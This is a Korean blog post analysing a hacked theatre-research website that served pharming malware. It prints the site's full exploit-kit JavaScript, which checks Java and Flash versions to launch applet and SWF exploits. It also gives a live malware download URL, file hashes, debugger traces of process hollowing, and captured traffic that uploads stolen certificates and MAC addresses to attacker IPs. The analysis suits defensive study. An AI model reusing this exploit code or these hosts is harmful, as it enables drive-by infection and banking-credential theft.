놀몸연극놀이연구소 사이트 파밍 유포지로 사용중

Posted by nopsled
2015.05.22 01:45 분석생활


<script>

function encode() {

var omg = ckl(), x1 = new Array, x2 = '';


for(var i=0;i<omg.length;i++)

{

if(omg[i] == 159)

{

//x2 += '';

}

else

{

x1[i] = omg[i] - 159;

x2 += String.fromCharCode(x1[i]);

}

}

return x2;

}


function CheckVersion11() {

if (apple.major != 11) return false;

if (apple.minor == 9 && apple.rev > 900) return false;

if (apple.minor > 2 && apple.rev > 202 && apple.nbwm > 406) return false;

return true;

}


function CheckVersion12() {

if (apple.major != 12) return false;

return true;

}


function CheckVersion13() {

if (apple.major != 13) return false;

if (apple.major == 13 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 241) return false;

return true;

}


function CheckVersion14() {

if (apple.major != 14) return false;

if (apple.major == 14 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 179) return false;

return true;

}


function CheckVersion15() {

if (apple.major != 15) return false;

if (apple.major == 15 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 167) return false;

return true;

}


function CheckVersion16() {

if (apple.major != 16) return false;

if (apple.major == 16 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 296) return false;

return true;

}


function CheckVersion17() {

if (apple.major != 17) return false;

if (apple.major == 17 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 134) return false;

return true;

}


function flash_run(fu, fd) {

var f_use = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="60" height="1">';

f_use = f_use + '<param name="movie" value="' + fu + '" />';

f_use = f_use + '<param name="play" value="true"/>';

f_use = f_use + '<param name=FlashVars value="' + fd + '" />';

f_use = f_use + '<!--[if !IE]>-->';

f_use = f_use + '<object type="application/x-shockwave-flash" data="' + fu + '" allowScriptAccess=always width="60" height="1">';

f_use = f_use + '<param name="movie" value="' + fu + '" />';

f_use = f_use + '<param name="play" value="true"/>';

f_use = f_use + '<param name=FlashVars value="' + fd + '" />';

f_use = f_use + '<!--<![endif]-->';

f_use = f_use + '<!--[if !IE]>--></object><!--<![endif]-->';

f_use = f_use + '</object>';

document.write(f_use);

}


var wmck=deployJava.getJREs()+"";

wmck=parseInt(wmck.replace(/\.|\_/g,''));

var vers=flash.prototype.getSwfVer();

vers=parseInt(vers.replace(/\.|\_/g,''));

var kaka = navigator.userAgent.toLowerCase();


var ckurl = encode();

var flashurl = ckls();


if( wmck > 17006 && wmck < 17011 )

{

if(kaka.indexOf("msie 6") > -1)

{

document.writeln("<object classid=\'clsid:8ad9c840-044e-11d1-b3e9-00805f499d93\' width=\'600\' height=\'400\'><param name=xiaomaolv value=\'"+ckurl+"\'><param name=bn value=\'woyouyizhixiaomaol\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'xml20130422.XML20130422.class\'><param name=archive value=\'"+jaguar+"\'><\/object>");

}

else

{

document.write("<br>");

var gondady=document.createElement("body");

document.body.appendChild(gondady);

var gondad=document.createElement("applet");

gondad.width="600";

gondad.height="400";

gondad.archive=jaguar;

gondad.code="xml20130422.XML20130422.class";

gondad.setAttribute("xiaomaolv",ckurl);

gondad.setAttribute("bn","woyouyizhixiaomaol");

gondad.setAttribute("si","conglaiyebuqi");

gondad.setAttribute("bs","748");

document.body.appendChild(gondad);

}

}

else if( wmck >= 17000 && wmck < 17007)

{

if(kaka.indexOf("msie 6") > -1)

{

document.writeln("<object classid=\'clsid:8ad9c840-044e-11d1-b3e9-00805f499d93\' width=\'256\' height=\'256\'><param name=xiaomaolv value=\'"+ckurl+"\'><param name=bn value=\'woyouyizhixiaomaolv\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'setup.hohoho.class\'><param name=archive value=\'"+audi+"\'><\/object>");

}

else

{

document.write("<br>");

var gondady=document.createElement("body");

document.body.appendChild(gondady);

var gondad=document.createElement("applet");

gondad.width="256";

gondad.height="256";

gondad.archive=audi;

gondad.code="setup.hohoho.class";

gondad.setAttribute("xiaomaolv",ckurl);

gondad.setAttribute("bn","woyouyizhixiaomaolv");

gondad.setAttribute("si","conglaiyebuqi");

gondad.setAttribute("bs","748");

document.body.appendChild(gondad);

}

}

else if(wmck <= 16027)

{

var okokx = GTR + ".class";

var ckckx = document.createElement('applet');

ckckx.archive=benz;

ckckx.code=okokx;

ckckx.width="30";

ckckx.height="1";

document.body.appendChild(ckckx);

var ckcks=document.createElement('param');

ckcks.name="dota";

ckcks.value=ckurl;

ckckx.appendChild(ckcks);

}

else

{

if( (kaka.indexOf("nt 6.1")>-1 || kaka.indexOf("nt 6.2")>-1) && kaka.indexOf("msie 8")==-1 )

{

if( (vers > 1600100 && vers <= 1600296) || (vers > 1700100 && vers <= 1700134) )

{

document.write("<embed width=60 height=1 src=ad.swf allowScriptAccess=always Play=true><\/embed>");

}

else

{

flash_run("logo.swf", "exec=FmF" + flashurl);

}

}

else if( (kaka.indexOf("nt 6.1")>-1 || kaka.indexOf("nt 6.2")>-1) && (CheckVersion16() || CheckVersion17()) && kaka.indexOf("msie 8")>-1 )

{

document.write("<embed width=60 height=1 src=ad.swf allowScriptAccess=always Play=true><\/embed>");

}

else if( CheckVersion11() || CheckVersion12() || CheckVersion13() || CheckVersion14() || CheckVersion15() )

{

flash_run("logo.swf", "exec=FmF" + flashurl);

}

else if( (kaka.indexOf("msie 6")>-1 || kaka.indexOf("msie 7")>-1) && apple.major==10 && apple.minor==3 && apple.rev<=183 )

{

document.write("<iframe src=ww.html width=60 height=1></iframe>");

}

}


if(kaka.indexOf("msie")>-1)

{

document.write("<iframe src=main.html width=60 height=1></iframe>");

}


</script> 

맥으로 분석하면 참 쉽다. 악성코드 감염에 거의 걱정하지 않아도 되고 소스보기를 이용해서 디코딩된 결과를 볼 수도 있고.



<applet archive="MvJwWu.jar" code="dpvsetup.class" width="30" height="1"><param name="dota" value="http://www.sanaesan.com/after_img/win.exe"></applet> 

java applet을 이용하여 exploit을 시도한다. value를 참조하여 악성코드를 다운 및 실행하여 자동으로 감염 시킨다. 무슨 exploit인지 궁금한 분들은 MvJwWu.jar를 분석해보면 된다.(여기까지 깊게 나가진 않겠음)




 FileName

 win.exe

 MD5

 B5B7DB16FF7AD62A387E1BFC9EEED959

 SHA-1

 84EF6838A7DF06415DC3CF19D38B2BFDB142EDF4

 Packer

 nsPack ver 3.x-4.1 reg by North Star

 유포지

 hxxp://sanaesan.com/after_img/win.exe

Packer가 by North Star? 뭐지..-_- 이름만 그런건가.

아무튼 nsPack으로 패킹 되었다. (언패킹의 경우 궁금하신분들이 요청 해주신다면 따로 포스팅 하겠다.)




0012FEC0   0040327F  /CALL to CreateProcessA

0012FEC4   00000000  |ModuleFileName = NULL

0012FEC8   00144830  |CommandLine = "C:\Windows\System32\cmd.exe"

0012FECC   00000000  |pProcessSecurity = NULL

0012FED0   00000000  |pThreadSecurity = NULL

0012FED4   00000000  |InheritHandles = FALSE

0012FED8   00000004  |CreationFlags = CREATE_SUSPENDED

0012FEDC   00000000  |pEnvironment = NULL

0012FEE0   00000000  |CurrentDir = NULL

0012FEE4   001446E8  |pStartupInfo = 001446E8

0012FEE8   001432F0  \pProcessInfo = 001432F0 

cmd.exe를 SUSPENDED로 실행한다. 이유는 다음에 나온다.



0012FED4   00403890  /CALL to WriteProcessMemory

0012FED8   00000048  |hProcess = 00000048 (window)

0012FEDC   00400000  |Address = 400000

0012FEE0   0016EE70  |Buffer = 0016EE70

0012FEE4   00000400  |BytesToWrite = 400 (1024.)

0012FEE8   0012FF20  \pBytesWritten = 0012FF20 

여러번에 걸쳐서 Process에 악성 데이터를 써 넣는다.

이렇게 만들어진 프로세스는 경로는 C:\windows\system32\cmd.exe로 뜨지만 속은 악성행위를 하고 있는 악성코드이다. 그러므로 C:\windows\system32\svchost.exe가 explorer.exe의 자식 프로세스로 생성되어있다면 의심을 해봐야 한다.





껍데기는 cmd.exe지만 속은 HTTP 통신을 위한 socket과 base64로 암호화된 문자열이 있다.

파밍의 특징은 저렇게 base64가 무더기로 등장한다.




Startpage를 네이버로 변경함으로써 경우의 수를 피할 수 있다. (예를 들어 시작페이지가 청와대라던가. 악성코드 제작자가 원했던 결과가 안나올수도 있기에)



GET /fcg-bin/cgi_get_portrait.fcg?uins=2071776069?=22820 HTTP/1.1

Accept: */*

Accept-Language: ko

Cache-Control: no-cache

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)

Host: users.qzone.qq.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: QZHTTP-2.37.1

Content-Encoding: gzip

Cache-Control: max-age=86400

Content-Type: text/html

Content-Length: 123

Date: Thu, 21 May 2015 16:04:26 GMT

Connection: keep-alive

Vary: Accept-Encoding


..........+./*)J.,qN..qJL...V220747730.T..V.()).../..O.7.+../J.+,.K.../...K.G(Gf...(........T240.320.342.345.J..j..&.aK~... 

파밍 IP를 받아오기 위해서 역시나 qzone으로 접속하여 파밍 IP를 받아온다.



GET /Count.asp?ver=001&mac=00-1C-42-55-3D-A4 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://eoqkrskfk.gnway.cc/Count.asp?ver=001&mac=00-1C-42-55-3D-A4

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: eoqkrskfk.gnway.cc

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: NetBox Version 2.8 Build 4128

Date: Thu, 21 May 2015 16:04:23 GMT

Connection: Keep-Alive

Set-Cookie: KIIRQBGIOBIABYDLMDIA=KJQKHHNTEWKFJIYGCLQTYOZZFATZYGWMWXTISQNW; path=/

Cache-control: private

Content-Type: text/html

Content-Length: 3


... 

사용자가 감염 당했다는 것을 전송하기 위해서 MAC주소를 전송한다.



GET /ip.php?=30729 HTTP/1.1

Accept: */*

Accept-Language: ko

Cache-Control: no-cache

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)

Host: 104.203.120.156

Connection: Keep-Alive


HTTP/1.1 200 OK

Connection: close

Date: Thu, 21 May 2015 16:04:26 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-Powered-By: PHP/5.2.17

Content-type: text/html


8fb122e4699fafdbc4fbed36d3715530

IP해쉬.



POST /upload.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://104.203.120.156/upload.php

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7da3e1bd0314

Content-Length: 295

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: 104.203.120.156

Cache-Control: no-cache


-----------------------------7da3e1bd0314

Content-Disposition: form-data; name="upload_file1"; filename="C:\DOCUME~1\nopsled\LOCALS~1\Temp\77a2cc089213880a45c1c69d818fd20e.zip"

Content-Type: application/x-zip-compressed


PK....................

-----------------------------7da3e1bd0314--


HTTP/1.1 200 OK

Connection: close

Date: Thu, 21 May 2015 16:04:28 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-Powered-By: PHP/5.2.17

Content-Type:text/html;charset=utf-8 

%temp%경로에 공인인증서 압축 후 인증서를 유출지로 전송한다.




금융감독원 팝업이 뜨면서 개인정보 입력 후 전송시 정보를 유출하게 된다.




어드민 페이지는 덤.

저작자 표시 비영리
신고